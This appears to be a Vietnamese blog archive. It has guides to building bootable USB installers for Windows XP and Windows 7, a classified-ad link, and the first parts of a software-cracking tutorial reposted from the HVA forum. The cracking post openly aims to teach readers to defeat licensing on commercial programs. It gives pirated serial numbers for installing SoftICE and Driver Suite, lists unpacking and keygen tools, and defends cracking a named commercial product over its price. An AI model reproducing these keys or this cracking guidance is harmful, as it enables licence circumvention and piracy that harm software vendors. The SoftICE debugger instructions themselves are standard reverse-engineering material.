Chân Trời Tri Thức

Hướng dẫn tạo USB cài XP+Windows 7+Hiren's Boot

2011-09-06T23:09:00.000-07:00

Hướng dẫn tạo USB cài XP+Windows 7+Hiren's Boot

A. NGUYÊN LIỆU.

1. Một chiếc USB 4GB trở lên.

2. Boot Ice dùng để format USB và tạo MBR cho USB. Mình thích tiện ích này vì tính tuỳ biến cao của nó chứ không cứng nhắc như tất cả các công cụ khác các bạn từng gặp. Có thể format tạo phân vùng ẩn chứa MBR, có thể thay đổi MBR để trỏ tới bootloader bất kì mà không kèm theo format lại, và có thể thay đổi tên file bootloader mặc định.

3. Ultimate Boot USB. Công cụ này cũng có khả năng format và tạo MBR cho USB. Nhưng mình giới thiệu với các bạn với mục đích khác. Đó là test xem USB sẽ boot như thế nào, có thành công hay không mà không cần phải boot thực sự hay dùng tới máy ảo làm chi cho mất thì giờ . Cái này là độc quyền bài viết này có.

Cả 2 công cụ này để chung vào một file nén, các bạn xả nén ra sẽ thấy.

http://www.mediafire.com/?1uamvomnee2

Pass: phucmap

4. Một bản Windows SP3(đuôi file là ISO)
5. Một Bản Windows 7(bản nào cũng được)
6. UltraISO

B. THỰC HIỆN:

1. Các bạn gắn USB 4GB cần tạo boot vào máy tính và nhớ rút hết các USB khác ra tránh nhầm lẫn, rồi chạy Boot Ice, format USB theo định dạng FAT32 cho phân vùng Boot.
Chú ý rằng chương trình tự động nhận USB nếu các bạn gắn sẵn, nếu không nó sẽ nhận luôn ổ cứng của các bạn. Chương trình này có khả năng làm việc cả trên ổ cứng nên các bạn hết sức cẩn thận.

Nếu các bạn thích để phân vùng Boot này ẩn và không bị Windows format "sờ tới", còn phân vùng còn lại để dạng NTFS chứa dữ liệu, hoặc đơn giản chỉ để format và tạo MBR cho USB có thể boot thì đều tham khảo theo chủ đề sau của mình (chú ý cứ để bootloader được MBR gọi mặc định là file GRLDR như chương trình đề nghị):

Tạo phân vùng ẨN trên USB để vừa boot, vừa lưu trữ dữ liệu

2. Các bạn copy các file GRLDR, MENU.LST trong file đã nén sẵn ở đây vào trực tiếp ổ gốc của USB cần tạo Boot:

http://www.mediafire.com/?mbmyzmdnj5d

Pass: phucmap

3. Các bạn dùng UltraISO mở file ISO của Windows SP3 Volume License rồi bung toàn bộ nội dung vào thư mục gốc của USB.

4. Các bạn làm tương tự với file ISO của bộ cài Windows 7. Chú ý rằng nếu các bạn lựa chọn tích hợp bản Enterprise mà muốn tích hợp thêm các bộ cài khác thì sẽ phức tạp hơn một chút, Lãng khách sẽ tạm thời chưa đề cập. Vì vậy, để có nhiều lựa chọn cài đặt cho Windows 7, các bạn hãy sử dụng bộ cài Windows 7 Ultimate.

5. Sau khi bung nén, kiểm tra lại file setup.exe của bộ cài Windows 7 đã ghi đè file setup.exe của Windows XP chưa, nếu chưa các bạn copy thủ công lại bước này (vì file setup.exe của Windows XP không cần thiết, còn file của Windows 7 lại cần).

6. Nếu các bạn muốn có đầy đủ 5 lựa chọn khi cài Windows 7 cho các cấu hình máy khác nhau (Ultimate, Professional, Home Prenium, Home Basic, Starter) thì chỉ cần dùng UltraISO xóa file "ei.cfg" nằm trong folder Sources của bộ cài đặt Windows 7 là được.

7. Xong rồi đó. Bây giờ là việc kiểm tra lại thành quả lao động của mình.
Các bạn chạy UBUSB, bấm vào lựa chọn Test USB như hình minh hoạ:

8. Nếu cửa sổ hiện ra thế này là OK rồi:

Như thế có nghĩa là bạn đã có thể dùng để cài Windows 7. Chương trình kiểm tra chỉ chạy được tới đó thôi.

Hang moi day

2011-04-28T03:19:00.001-07:00

http://www.raovat123.com/t.4127387.ban-cpu-core-2-t7300-laptop-gia-re-day.html

Hướng dẫn cài winxp bằng usb

2008-12-11T05:29:00.000-08:00

Cài đặt Windows XP từ ổ USB Flash Nếu một ngày bạn muốn cài đặt Windows XP nhưng máy tính của bạn lại không có ổ CD-ROM, bạn sẽ giải quyết thế nào? Bài viết sau đây sẽ hướng dẫn chi tiết cho bạn cách cài đặt Windows XP từ ổ USB.

Bước 1:

Chuẩn bị sẵn 1 ổ USB Flash (ít nhất 2GB).

Lưu ý: Khi thực hiện theo bài hướng dẫn này, bạn cần có một máy tính với ổ CD-ROM hoạt động tốt.

Bước 2:

Tải gói phần mềm Komku-SP-usb.exe tại đây.

Bước 3:

Kích đúp Komku-SP-usb.exe. Một cửa sổ xuất hiện, kích Install.

Bước 4:

Cắm ổ USB vào máy tính.

Tìm tới thư mục C:\Komku\PeToUSB. Kích đúp PeToUSB.exe.

Một cửa sổ sẽ hiện ra như sau…

Destination Drive: chọn USB Removable
Đánh dấu các ô Enable Disk Format, Quick Format, Enable LBA (FAT 16x)
Drive Label: Đặt nhãn ổ USB tùy ý bạn, trong trường hợp này là XP-KOMKU
Sau đó kích Start.

Kích Yes để tiếp tục…

Kích Yes

Đợi một chút…

Kích OK, sau đó bạn có thể đóng cửa sổ PeToUSB

Bước 5:

Mở Command Prompt bằng cách vào Start > Run > gõ cmd > kích OK

Trong cửa sổ lệnh, chuyển tới thư mục C:\Komku\bootsect

Cụ thể: đầu tiên, gõ cd\ rồi nhấn Enter

Sau đó gõ cd komku\bootsect rồi nhấn Enter

Kết quả…

Đừng đóng cửa sổ Command Prompt, hãy tiếp tục bước 6.

Bước 6:

Trong cửa sổ Command Promt, gõ bootsect /nt52 H:

trong đó H là tên ổ USB trên máy.

Rồi nhấn Enter. Kết quả

Bước 7:

Tiếp tục gõ cd.. và nhấn Enter

Sau đó gõ cd usb_prep8 rồi nhấn Enter

Gõ usb_prep8 lần nữa, nhấn Enter

Bước 8:

Bạn sẽ thấy cửa sổ Command Prompt như sau:

Ấn phím bất kỳ để tiếp tục.

Bây giờ đưa đĩa Windows XP vào ổ CD/DVD ROM rồi quay trở lại cửa sổ Command Prompt.

Gõ 1 nhấn Enter hộp thoại Browse For Folder sẽ xuất hiện. Chọn ổ CD/DVD của bạn, kích OK.

Kết quả: mục “XP Setup Source Path” sẽ chuyển thành tên ổ CD/DVD của bạn.

Ở mục 2, nếu chữ cái T đã được gán cho 1 ổ đĩa trên máy tính bạn, bạn cần thay đổi mục này. Nếu không, hãy để nguyên.

Vậy làm thế nào để thay đổi?

Gõ 2 rồi nhấn Enter, sau đó nhập 1 chữ cái bất kỳ không trùng với tên các ổ đĩa trên máy tính bạn. Ví dụ bạn không có ổ S, nhập S rồi nhấn Enter.

Trở lại cửa sổ usb_prep8, gõ 3 rồi nhấn Enter.

Nhập tên ổ USB của bạn. Trong trường hợp này ổ USB là ổ H

vì vậy nhập H rồi nhấn Enter.

Tiếp theo, nhập 4 nhấn Enter rồi đợi một lát.

Gõ Y nhấn Enter và tiếp tục đợi.

Sau khi quá trình format ổ đĩa ảo hoàn thành, nhấn phím bất kỳ để tiếp tục.

Tiếp tục đợi….

Nhấn phím bất kỳ để tiếp tục

Chọn Yes

Tiếp tục Yes

Chọn Yes, đợi một lát rồi nhấn phím bất kỳ 2 lần để đóng cửa sổ usb_prep8

Chúc mừng bạn, cuối cùng ổ USB của bạn đã sẵn sàng.

Bước 9:

Cắm ổ USB vào chiếc máy tính không có ổ CD-ROM mà bạn muốn cài đặt Windows XP. Vào BIOS, chọn khởi động từ USB HDD (hoặc USB ZIP tùy mỗi máy). Sau đó khởi động lại máy từ ổ USB.

Chọn “TXT Mode Setup...”

Tiếp tục cài đặt Windows XP như bình thường.

Khi chế độ cài đặt text mode kết thúc, máy tính sẽ tự khởi động lại. Lần này chọn “GUI Mode Setup…”

Tiếp tục cài đặt các bước cài đặt Windows XP cho tới khi hoàn thành!

Chúc các bạn thành công!

Crack soft

2007-10-25T20:43:00.000-07:00

Lời nói đầu:

Chào các bạn, chắc hẳn trong số các bạn ai cũng từng xài đang xài và sẽ xài đồ chùa do người khác crack. Có khi nào các bạn nghĩ rằng mình sẽ crack cho mình để xài hay không? Vâng! cảm giác khi crack được một soft rất thú vị…Nhưng làm sao để crack…ha ha đó chính là câu trả lờI chính đấy.Hiện nay có nhiều bài viết liên chỉ dẫn về cách crack phần mềm, tuy rất hay nhưng hầu như chỉ dành cho nhũng ngườI đã biết crack, do đó các bạn chưa biết gì về crack không thể biết được.Vì lý do đó tôi đăng lên diễn đàn HVA một TUT hướng dẫn các bạn từ A đến Z…Vì sao tôi chọn hướng crack mà không chọn hướng hack, rất đơn giản, crk ít bị công an tóm, còn hack thì lạng quạng vào tù gỡ lịch he he…
Trong loạt bài này (khoảng 30 phần) tôi sẽ hướng dẫn các bạn từ bước chân đầu tiên tớI bước chân …lên xe bít bùng ke ke ke…Trong bài viết tôi có sử dụng bài biết của các đạI ca trong làng crack như NVH©,SoftCracker_vn, Nguyen Manh Cuong, luucorp,nicehacker,thitmeongonhon,Le Vu Hoang, Tran Ngoc Huan, Bui Thanh Quang, v..v…Vì lợI ít chung mong các đạI ca tha tộI cho me…Tất cả vi nâng cao chất lượng cho HVA…thank a lot

hacnho

PHẦN I: Chuẩn Bị

I.Công cụ cơ bản cần có

a.Debug :
-SoftICe 4.05 for 9x, NT---Công cụ debug khá mạnh tuy nhiên chuyên làm Win bị Ice
-Numega SoftICE Driver Suite 2.6 for XP ; mình thường dùng vì nó ít làm PC bị đóng băng
-Smart Check 603(601 cũng đươc): debug for VB (chạy tốt trên 9x)
-Quaid Analyser :debug for DOS
mình không dùng Win9X nên không dùng các dubug for 9X như TRW2k, nếu các bác dùng Win9X thì hãy dùng nó
b.Debug add_on:
-BreakICE for SoftICe4.05: tìm các breakpoint
-FrogsICE: tạo ngắt ảo làm các chương trình detect SoftICE không detect được SI…Điển hình như VK2000 build 10727 –không chạy đuợc trên Nt,Xp
-SoftICe tools: các công cụ hỗ trợ SI như: ICE-HIDE, ICE-SET,INT6TEST,TRACEME, UCF 2000
-Icedump: đổ bộ nhớ từ Si tới file
Virtual address to file offset: khi Si tìm được offset ảo thì nó sẽ giúp Si tìm được offset thật…
c. HexEditor: chỉnh sửa file hexa
- HexaWorkShop3.0 : chỉnh sửa các file hexa khá mạnh
- Hacker View 602(HIEW): công cụ chỉnh sửa file hexa rất mạnh (45% phần mềm muốn crk được đều nhờ nó)
d. DeCompliers: dùng để dịch ngược file nguồn như exe, dll ra assembly

- WinDeAssembly893: công cụ khá mạnh dùng dịch ngược file (nên kiếm bản fix để khỏI cần dùng HIEW, vi nó sẽ thêm menu EDIT trên thanh toolsbar, ta có thể chỉnh sửa file trực tiếp trên WDASM)

Chú Ý; để WDASM chạy ngon lành bạn cần kiếm cho được các file patch cho nó như sau:
*.SDR Enable for VB: WD893SDR.exe: giúp WDASM deassembly được VB
*.W32Dasm V8.93 Permanent Patch Maker: This patcher will add a button to your W32Dasm CodePatcher screen which will allow you to save your patches directly into the program.
It will also change the W32Dasm CreateFile call so that you can then edit and save files whilst you have them open in W32Dasm.
*.Modifying pro loaded in WDASM: W32D-LaZ.exe: sửa lỗI cho WDASM
*.W32pp: thêm menu edit, thay đổI hình nền cho WDASM

----------hiện nay mình đã làm một bản WDASM rất xịn, fix,patch hết, bác nào có host mình up lên cho anh em tảI về xài, đỡ mất công tìm file.rar khoang 0.9mb------------

-Riêng những chương trình được viết bằng Delphi thì nên dùng hai chương trình sau để decompliers: EXE TO DPR,EIRE

-Install Shied decomplier: decomplier cho Install Shied

-BorlandC,Turbo Pascal,Vb,VC,Win32Asm,MASm611,: dùng để viết keygen

e.Quan trọng không kém là các chương trình dùng để pack, và unpack các soft .
(Các bạn lưu ý, mình dùng các thuật ngữ mà không giảI thích, bởI vì mình sẽ có một phần dùng để giảI thích các thuật ngữ, các bạn chịu khó theo dõi-Phần3)

-Procdump32: giảI nén cho nhiều dạng file – thích hợp cho các file pack mà ta không biết được nó pack bằng gì
-DeShrink: dùng giảI nén cho Shrink
-Upx093w: giảI nén UPX
-unpetite: giảI nén petite( tui sợ nhất nó, thank LE VU HOANG đã chỉ tui về nó)
-I5Comp : giảI nén file.cab
-Install Shied decompressor: giảI nén Install Shied decompressor
-UnPEprot: giảI nén cho khoá PE
….vào còn nhiều dạng nén khác như ASP, Pklite…tuỳ theo mà các bạn tìm unpacker cho thích hợp

f. Ngoài ra còn có các chương trình dùng để sửa giao diện của file nguồn như: Resource Hacker, Exe Scope,Symantec Resource Studio,Restorator v2.50 build 757…cũng khá hữu dụng

II. Cài Đặt:

tất cả các soft tôi hướng dẫn ở trên đều rất dễ cài, tảI về và tiến hành cài bình thường …bạn có thể tìm chúng ở trang tools của HVA, hay vào www.ctools.net để tảI chúng về…Riêng SoftICE405 và Numega SoftICE Driver Suite2.6 là tôi xin hướng dẫn một chút xíu.tài liệu về cài đặt SoftICe405 tôi post từ bài của anh NVH©…

*.Cách cài đặt Numega SoftICE Driver Suite2.6
tiến hành cài bình thường, nhập serial là :7804-17786F-73 or 7808-21675E-F4, sau khi cài xong trong bảng Driver Studio Config, các bạn nên chọn là Manual, nghĩa là muốn xài lúc nào thì chỉ cần vào mục Numega SoftICE Driver Suite trên thanh Start, chọn Start SoftICE, không muốn xài nó nữa thì chon disable…rất đơn giản…Có điều trong Numega SoftICE Driver Suite2.6 không hiểu sao không set được breakpoint Hmemcpy( dùng cho các chương trình viết bằng Vb)..ai biết chỉ giùm

*.Cài SoftIce405, he he he trước khi cài nên backup data trong máy lạI nhe, tốt nhất là ghost lạI là Ok? Vì nó dễ làm crash máy của bạn lắm…kinh nghiêm của tui khi cài nó lần đàu tiên tưởng dễ xơi ai dè tiêu luôn window phảI format cài lạI, mất toàn bộ mail bồ tui gửI cho…cẩn thận đó nhe các bác…Dù xài nó mòn răng nhưng mỗI lần cài nó là tui xanh mặt, nhất là lúc khởi động máy…TrờI ạ bồ tui có bầu tui không sợ bằng lúc nó load lên đâu…sau đây là cách cài nó

1. Download Softice for Win 9x ở www.numega.com
2. Tiến hành cài đặt Softice chỉ bằng cách nhấn vào trình cài đặt Setup
3. Khi cài đặt SoftIce sẽ yêu cầu bạn đánh số Serial thì mới có thể tiếp tục
4. Bạn đánh 1900-0000DD-9B
5. OK. Tiếp tục cài Softice, nhưng trước khi yêu cầu restart lại máy bạn hãy làm:
6. Mở Notepad hay một trình soạn thảo nào đó, mở file winice.dat trong thư mục của Numega đã cài vào máy bạn
7. Cố gắng tìm dòng ghi INIT="WR;X;" (ở gần đầu file) và sửa nó thành INIT="WD;WR;WL;CODE ON;X;"
8. Cố gắng tìm dòng như sau : (ở gần cuối file)
; ***** Examples of export symbols that can be inluded for Windows 9x *****
; Change the path to the appropriate drive and directory
;EXP=c:\windows\system\kernel32.dll
;EXP=c:\windows\system\user32.dll
;EXP=c:\windows\system\gdi32.dll
;EXP=c:\windows\system\comdlg32.dll
;EXP=c:\windows\system\shell32.dll
;EXP=c:\windows\system\advapi32.dll
;EXP=c:\windows\system\shell232.dll
;EXP=c:\windows\system\comctl32.dll
;EXP=c:\windows\system\crtdll.dll
;EXP=c:\windows\system\version.dll
;EXP=c:\windows\system\netlib32.dll
;EXP=c:\windows\system\msshrui.dll
;EXP=c:\windows\system\msnet32.dll
;EXP=c:\windows\system\mspwl32.dll
;EXP=c:\windows\system\mpr.dll
Và hãy xoá tất cả những dấu chấm phẩy ( ở đầu dòng đoạn này đi. OK bây giờ save lại và restart lại máy để bắt đầu sử dụng

Bai viet cua hacnho from HVA (xin vui long de dong nay khi ban trich dan lai--thanx a lot)

Trong phần 2 tui sẽ hướng dẫn các bác sử dụng SoftICe, từng câu lệnh, từng hàm…rất cặn kẽ rất dễ hiểu

PHẦn II:
Chào các bạn chúng ta lạI gặp nhau ở phần II này, qua bài viết ở phần I hẳn các bạn đã chuẩn bị đầy đủ “súng ống đạn dược” để chiến đấu vớI các soft rồI phảI không? Ok ở phần II này tôi xin hướng dẫn các bạn sử dụng công cụ SoftIce, đây là công cụ debug mạnh cực kỳ, nó được ví như khẩu M-16 của các chiến sỹ marine trên chiến trường. Muốn “giết chết” được phần mềm các bạn phảI hiểu rõ các sử dụng nó, nếu không cẩn thận thì bạn sẽ bị chính nó kill đấy…
Chú ý: trong bài này tôi có tham khảo bài viết của DTK,NVH©—thanx a lot for support

I.SoffICE là gì và tại sao phải dùng nó?
Chúng ta đều biết SoftIce là công cụ của hãng Numega viết ra dùng cho các programmer dùng để debug chương trình…Tuy nhiên nó được các cracker thế giớI dùng để crack các phần mềm…Do vậy nguyên gốc của nó không phảI là dùng để phục vụ cho mục đích crack…Có nhiều bạn hỏI tui tạI sao SoftIce là một công cụ dùng để crack mà lạI đòi số serial, sao ta không dùng chính nó để crack nó. TrờI ạ, có bạn lạI dùng chính SoftIce để crack chính nó, có bạn crack không được rồI la lên rằng “ TrờI ạ, SoftIce lạI detect SoftIce…”!!! he he bây giờ các bạn đã hiều về lai lịch của SofIce rồI chứ, nó không phảI phần mềm viết riêng cho các cracker chúng ta đâu mà chính do chúng ta tìm được nó và sử dụng nó vào mục đích đen tốI đấy chứ. Không sao bản thân cracker là những ngườI rất nghèo, nghèo tiền, nghèo tình, nhưng chỉ có giàu duy nhất ở một lòng đam mê, luôn luôn tìm tòi khám phá…Thử hỏI nếu không có các cracker thì thế giớI IT đâu phát triển…(vì có phá để rồI mớI có sửa …rồI bị phá tiếp ke ke).
Các nhà lập trình chắc chắn rất căm thù cracker, nhưng họ không nghĩ đến chúng ta những ngườI nghèo tiền nhưng giàu lòng đam mê. Đơn cử như hãng SoftTex họ viết ra EV Tran Tech 2.0 nhưng lạI bán vớI giá cắt cổ, 4000000VND, trờI ạ tui mỗI tháng má tui gửI cho 1 triệu , trừ các khoản chi phí tui chỉ còn lạI vỏn vẹn có 50000, nếu muốn xài Ev Tran tui phảI để dành dài cổ luôn…Do đó cách duy nhất là crack nó bằng M-16 thôi…Oh các bác thử tưởng tượng tui chỉ dùng có vỏn vẹn có một lệnh (? Edx )và set hai break point(bpx getwindowtexta, bpx 4xxxBC) : offset xxx các bác tìm nhé:: là tui đã được số returncode . Không phảI tui ham crack mà tạI họ ép tui đấy chứ.

II.Những kiến thức cơ bản về sử dụng SoftICE
Bật cửa sổ SoftICE

Bạn có thể bật (hiển thị) cửa sổ SoftICE bất kì lúc nào sau khi đã cài SoftICE bằng cách nhấn Ctrl-D, mặc định là vậy, bạn cũng có thể thay đổi bằng lệnh:

ALTKEY [Alt letter | Ctrl letter]

Thí dụ nếu bạn muốn dùng Alt-E để bật/tắt SoftICE thay cho Ctrl-D, trong Command Window (khung dưới cùng của SoftICE) nhập:
ALTKEY Alt E
Giao diện SoftICE

Cửa sổ SoftICE được chia làm nhiều khung, nếu bạn cấu hình như file Winice.dat của tui thì chỉ thấy được 4 khung quan trọng nhất:
• Khung trên cùng là Register Window, hiển thị các giá trị hiện hành của các thanh ghi, sau mỗi câu lệnh thi hành, thanh ghi hay cờ nào bị thay đổi do câu lệnh đó thì màu hiển thị sẽ thay đổi, có màu xanh lá (bình thường là trắng).

Bạn có thể bật/tắt khung này bằng lệnh WR. Trong Command Window (khung dưới cùng) nhập:
WR (enter)
lần thứ nhất sẽ tắt (hay bật) Register Window, gọi lần thứ 2 để bật (hay tắt) nó.

Để thay đổi giá trị của 1 thanh ghi bất kì bạn có thể dùng chuột kích vào giá trị của thanh ghi cần thay đổi trong Register Window sau đó nhập giá trị cần thay đổi hoặc trong Command Window bạn dùng lệnh:

R Tên_thanh_ghi Giá_trị_cần_thay_đổi

Thí dụ để thay đổi giá trị của thanh ghi EAX đến 400000h, nhập:
R EAX 400000

Để bật tắt cờ dùng cú pháp sau:

R FL Tên_cờ

Thí dụ cờ nhớ hiện tại đang tắt, để set nó lên, nhập:
R FL C
Tương tự để tắt nó dùng lệnh:
R FL C
• Khung thứ hai là Data Windows dùng hiển thị dữ liệu, nếu bạn đã từng sử dụng qua 1 trình biên tập Hex sẽ thấy rất quen thuộc với khung này. Được chia thành 3 cột, cột thứ nhất cho biết địa chỉ trong vùng nhớ của dữ liệu đang hiển thị, cột thứ 2 là giá trị từng Byte dữ liệu (mặc định là vậy, bạn cũng có thể thay đổi để hiển thị kiểu dữ liệu khác) và cột cuối cùng là dữ liệu hiển thị dưới dạng các kí tự ASCII, đối với cột này SoftICE chỉ hiển thị các kí tự in được và không phải là các kí tự đồ họa.

Bạn có thể dùng chuột để kéo lên 1 hàng hay 1 trang dữ liệu trong cửa sổ này nhờ vào thanh Scrollbar ở cạnh phải của khung. Bạn cũng có thể dùng bàn phím:
Alt-Up : lên 1 hàng
Alt-Down : xuống 1 hàng
Alt-Page Up : lên 1 trang
Alt-Page Down : xuống 1 trang

Để bật/tắt Data Window dùng lệnh WD.

Để thay đổi kích thước (chiều cao) của Data Window dùng lệnh:

WD kích_thước_muốn_đặt

Thí dụ bạn muốn đặt kích thước của Data Window là 20 hàng, trong Command Window nhập:
WD 20

Bạn có thể biên tập trực tiếp các giá trị trong Data Window bằng cách kích chuột vào khung Data Windows (hoặc nhấn Alt-D) để chuyển con trỏ vào khung này, sau đó nhập giá trị cần sửa đổi.

Để thay đổi kiểu hiển thị dữ liệu trong Data Window thí dụ Byte, Word, DWord, Short Real, Long Real hay 10 Byte Real bạn có thể dùng chuột kích vào text hiển thị kiểu dữ liệu hiện dùng nằm phía trên của khung Data Window.
• Khung thứ 3 là Code Window, hiển thị các lệnh hợp ngữ, được chia thành 3 cột, cột bên trái hiển thị địa chỉ trong bộ nhớ của câu lệnh, cột thứ hai là mã Byte của câu lệnh và cột thứ 3 hiển thị lệnh được disassembly.

Bạn có thể dùng chuột để kéo lên 1 hàng hay 1 trang dữ liệu trong cửa sổ này nhờ vào thanh Scrollbar ở cạnh phải của khung. Bạn cũng có thể dùng bàn phím:
Ctrl-Up : lên 1 hàng
Ctrl-Down : xuống 1 hàng
Ctrl-Page Up : lên 1 trang
Ctrl-Page Down : xuống 1 trang

Để bật/tắt Code Window dùng lệnh WC.

Để thay đổi kích thước (chiều cao) của Code Window dùng lệnh:

WC kích_thước_muốn_đặt

Thí dụ bạn muốn đặt kích thước của Code Window là 10 hàng, trong Command Window nhập:
WC 10

Nếu thấy cột chứa mã Byte của các câu lệnh (cột thứ 2) không cần thiết, bạn có thể tắt nó bằng cách nhập lệnh Code Off trong Command Window, và bật lại bằng lệnh Code On.

Để di chuyển con trỏ vào trong Code Window bạn nhấn Alt-C

Câu lệnh nằm trên thanh ngang màu đỏ trong Code Window là câu lệnh đang được thực thi tại thời điểm SoftICE bật lên, và được SoftICE làm "đóng băng" tạm thời.
• Khung thứ 4 là Command Window dùng để nhập lệnh và hiển thị các thông báo của SoftICE.
Để xoá các lệnh đã nhập hoặc các thông báo tạo bởi SoftICE trước đó dùng lệnh Cls.

Để bật/tắt các khung khác trong cửa sổ SoftICE bạn có thể dùng các lệnh sau:
• WF : bật/tắt Floating Point Stack Window
• WL : bật/tắt Locals Window
• WW : bật/tắt Watch Window

Thanh nằm dưới cùng của cửa sổ SoftICE để hiển thị các trợ giúp tức thời (bên trái) và tên của Process (tiến trình) đang được theo dõi bởi SoftICE (bên phải).
Thoát khỏi cửa sổ SoftICE

Để thoát tạm thời khỏi cửa sổ SoftICE dùng lệnh X.
Bạn cũng có thể tạm thoát SoftICE bằng cách nhấn F5 hoặc Ctrl-D.
Thay đổi kích thước của cửa sổ SoftICE

Để thay đổi kích thước của cửa sổ SoftICE dùng lệnh:

Lines kích_thước_mới

Thí dụ để thay đổi cửa sổ SoftICE thành 60 dòng, nhập:
Lines 60
Lấy trợ giúp từ SoftICE

Để hiển thị các trợ giúp của SoftICE bạn có thể dùng lệnh H hoặc Help.
Để nhận được trợ giúp riêng biệt về 1 lệnh nào đó dùng cú pháp sau:

H [command]

hay

Help [command]

Thí dụ lệnh:
H AltKey
sẽ hiển thị các trợ giúp của SoftICE cho lệnh AltKey như sau:
Set key sequence to invoke window
ALTKEY [ALT letter | CTRL letter]
Ex : ALTKEY ALT D
Khó khăn với SoftICE

SoftICE là 1 chương trình rất khó chịu, bất kì khi nào bạn thi hành 1 ứng dụng bị lỗi hoặc xung đột với SoftICE, cửa sổ SoftICE sẽ bật lên ngay, gặp trường hợp đó, bạn nhấn phím C để tiếp tục thi hành ứng dụng này hay nhấn phím R để trở về SoftICE (con trỏ sẽ xuất hiện lại trong Command Window của SoftICE để cho phép nhập lệnh), bạn nhập lệnh EXIT để nhờ SoftICE ép Process gặp lỗi này thoát cưỡng bức. Nếu sau khi làm như vậy, bạn gặp lỗi màn-hình-xanh( màn hình xanhchết chóc trong Won9x,và WinME), cứ bình tĩnh nhấn Enter hoặc Esc, hệ thống sẽ trở lại bình thường còn nếu hệ thống bị "đóng băng" thật sự, hay chấp nhận điều đó. Nhân vô thập toàn sự vô thập mỹ mà!!!
III.Dùng Breakpoint (điểm ngắt) trong SoftICE
Breakpoint là gì và tại sao phải dùng nó?

Có thể hiểu 1 cách gần đúng Breakpoint tương tự như 1 sự gài bẫy hệ thống. Khi bạn tạo 1 Breakpoint bằng SoftICE (hay các chương trình Debug tương tự khác), bất kì khi nào hệ thống xuất hiện tình trạng mà nó thoả mãn các điều kiện trong Breakpoint của bạn, SoftICE sẽ đóng băng tiến trình xảy ra Breakpoint, và bạn có thể theo dõi tình trạng hiện hành của hệ thống (mã, dữ liệu, các thanh ghi...) nhờ vào cửa sổ của SoftICE.
Đặt 1 Breakpoint chính xác, đó là điều kiện đầu tiên để bạn có thể trở thành 1 Cracker.

IV.Giới thiệu về Breakpoint trong SoftICE

Bạn có thể dùng SoftICE để thiết lập Breakpoint trong mã chương trình đang thi hành, trong thao tác đọc viết vào 1 vị trí bộ nhớ, ngắt (interrupts) và đọc viết tới các I/O ports... SoftICE sẽ gán 1 chỉ số, từ 0 đến FFh cho mỗi Breakpoint được thiết lập. Bạn có thể dùng chỉ số của Breakpoint để nhận diện các Breakpoint khi đặt, xóa, vô hiệu hóa, kích hoạt hay biên tập chúng.
Tất cả các Breakpoint của SoftICE là bền vững, nghĩa là SottICE sẽ theo dõi và duy trì 1 Breakpoint cho tới khi bạn xoá hoặc vô hiệu hóa nó bằng lệnh BC hay BD. Sau khi xoá các Breakpoint, có thể xem lại chúng bằng lệnh BH, điều này sẽ hiển thị 1 danh sách các Breakpoint đã dùng.
Trong SoftICE, bạn có thể đặt 1 lần tới 256 Breakpoint. Tuy nhiên, số các Breakpoint Memory (BPM) và I/O (BPIO) không được quá 4, điều này là do hạn chế của bộ vi xử lí x86.
Những dạng Breakpoint được hổ trợ bởi SoftICE

SoftICE cung cấp 1 loạt các khả năng Breakpoint đầy sức mạnh như sau:
• Execution Breakpoints : SoftICE thay thế chỉ thị máy (lệnh) hiện có bởi INT 3. Bạn có thể dùng lệnh BPX để thiết lập Execution Breakpoints.
• Memory Breakpoints : SoftICE dùng các thanh ghi debug của x86 để ngắt khi 1 hay nhiều Byte/Word/DWord xác định nào đó của bộ nhớ được đọc, viết hoặc thi hành. Bạn dùng lệnh BPM để đặt Memory Breakpoints.
• Interrupt Breakpoints : SoftICE chặn ngắt (interrupt) bằng cách sửa đổi IDT (Interrupt Descriptor Table) vectors. Bạn dùng lệnh BPINT để đặt Interrupt Breakpoints.
• I/O Breakpoints : SoftICE dùng các thanh ghi debug mở rộng trên các CPU Pentium và Pentium-Pro để theo dõi các chỉ thị IN hay OUT đến 1 cổng (port) xác định nào đó. Bạn có thể dùng lệnh BPIO để đặt I/O Breakpoints.
• Window Message Breakpoints : SoftICE bẫy 1 hoặc 1 dãy các thông điệp đi đến 1 cửa sổ xác định. Bạn có thể dùng lệnh BMSG để thiết lập Window Message Breakpoints.
Các tùy biến cho Breakpoint

Bạn có thể tùy biến thêm cho các dạng Breakpoint bằng cách dùng 2 tùy chọn sau:
• Biểu thức điều kiện [IF expression] : Muốn Breakpoint xảy ra biểu thức phải có giá trị khác 0 (True).
• Hành vi Breakpoint [DO "command1;command2;"] : 1 dãy các lệnh SoftICE sẽ được tự động thi hành khi xảy ra Breakpoint.
Execution Breakpoints

1 Execution Breakpoint sẽ chặn các chỉ thị máy thí dụ như 1 lời gọi hàm hay 1 câu lệnh nào đó. Đây là dạng Breakpoint thường dùng nhất. Bằng cách thay thế câu lệnh hiện có bằng 1 lệnh INT 3, SoftICE sẽ lấy được điều khiển khi thi hành Breakpoint INT 3 này.
Có 2 cách để đặt Execution Breakpoint trong SoftICE : dùng chuột và dùng lệnh BPX.
Dùng chuột để đặt Breakpoint
Bạn có thể dùng chuột để đặt hay xóa Breakpoint dạng point-and-shoot (Breakpoint bền vững) và Breakpoint dạng one-shot (Breakpoint chỉ dùng 1 lần).
Để đặt 1 Breakpoint dạng point-and-shoot, trong Code Window kích đôi vào hàng lệnh mà bạn muốn đặt điểm ngắt. SoftICE sẽ điểm sáng hàng này. Kích đôi hàng này lần nữa để xóa Breakpoint.
Để đặt Breakpoint dạng one-shot, kích chuột vào hàng mà bạn muốn đặt Breakpoint để di chuyển con trỏ đến hàng này sau đó dùng lệnh HERE (hay nhấn phím F7).
khi thi hành đến hàng lệnh đã được đặt Breakpoint, SoftICE sẽ cho "đóng băng" Process đang theo dõi và bạn có thể theo dõi tình trạng hiện hành của tiến trình này.
Dùng lệnh BPX để đặt Breakpoint
Dùng lệnh BPX với các tham số sau để đặt 1 Execution Breakpoint:

BPX [address] [IF expression] [DO "command1;command2;"]

Tìm hiểu thí dụ sau để hiểu kĩ hơn về lệnh BPX:

Chạy Notepad, gõ 1, 2 từ sau đó chọn File.New. Notepad sẽ hiển thị hộp thông báo nhắc nhở có Save lại không. Hộp thông báo có title 'Notepad', với chuỗi thông báo 'The text in the Untitled file has changed.\n\nDo you want to save the changes?'.

Ghi chú: '\n' có nghĩa là xuống hàng.

Bạn nhấn Cancel.
Để hiển thị được hộp thông báo trên, Notepad phải gọi API MessageBoxA. Chúng ta đặt 1 Breakpoint sao cho khi Notepad gọi API trên sẽ bị SoftICE cho "đóng băng".
Vào SoftICE (Ctrl-D), nhập:
